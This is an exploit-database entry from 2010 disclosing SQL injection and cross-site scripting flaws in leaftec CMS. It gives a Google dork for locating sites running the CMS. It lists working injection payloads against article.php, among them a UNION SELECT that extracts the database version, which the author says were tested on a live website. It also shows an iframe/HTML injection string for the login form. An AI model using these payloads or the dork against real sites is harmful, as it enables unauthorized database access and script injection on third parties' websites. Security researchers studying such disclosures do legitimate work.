leaftec cms multiple vulnerabilities

2010-03-26T00:00:00
ID 1337DAY-ID-11458
Type zdt
Reporter Valentin Hobel
Modified 2010-03-26T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ====================================
leaftec cms multiple vulnerabilities
====================================


# Exploit Title: leaftec cms multiple vulnerabilities
# Date: 21.03.2010
# Author: Valentin
# Version:
# Tested on: Debian etch
# CVE : 
# Code :
 
 
 
:: General information
:: leaftec cms multiple vulnerabilities discovered
:: by Valentin H?¶bel
:: [email protected]
 
:: Product information
:: Name = leaftec cms
:: Vendor = leaftec
:: Vendor Website = http://www.leaftec.de/
:: About the product = http://www.leaftec.de/serv_cms.php
:: Affected versions =
:: Google dork: e.g. "?© 2006 leaftec Design"
 
 
:: Vulnerabilities
 
#1 SQL Injection
Sadly the CMS is not available for free download but some German companies are using it.
leaftec cms contains a blog feature which displays written content, file: article.php.
 
Vulnerable URL:
http://www.some-cool-domain.tld/article.php?id=XX
 
Examples for testing and injecting SQL stuff:
http://www.some-cool-domain.tld/article.php?id='
http://www.some-cool-domain.tld/article.php?id="
http://www.some-cool-domain.tld/article.php?id=XX+AND+1=2+UNION+SELECT+1,2,3,4,5,concat(version()),7--
(Tested on a live website using leaftec cms.)
--------------------------------------------------------------------------------------------------------
 
 
#2 XSS / HTML Code Injection
Several parts of the CMS allow HTML and Java Script code injection, e.g. the login box.
After submitting the form the cms puts a red border around the login and password field but
also implements the injected code into the website.
 
Example for HTML code:
"><iframe src=http://www.google.de></iframe>
--------------------------------------------------------------------------------------------------------
 
 
 
:: Additional information
:: Vendor contacted = 21.03.2010
:: Vulnerabilities fixed = no reply received
:: Solution = Upgrade to version XX or higher if available



#  0day.today [2018-03-17]  #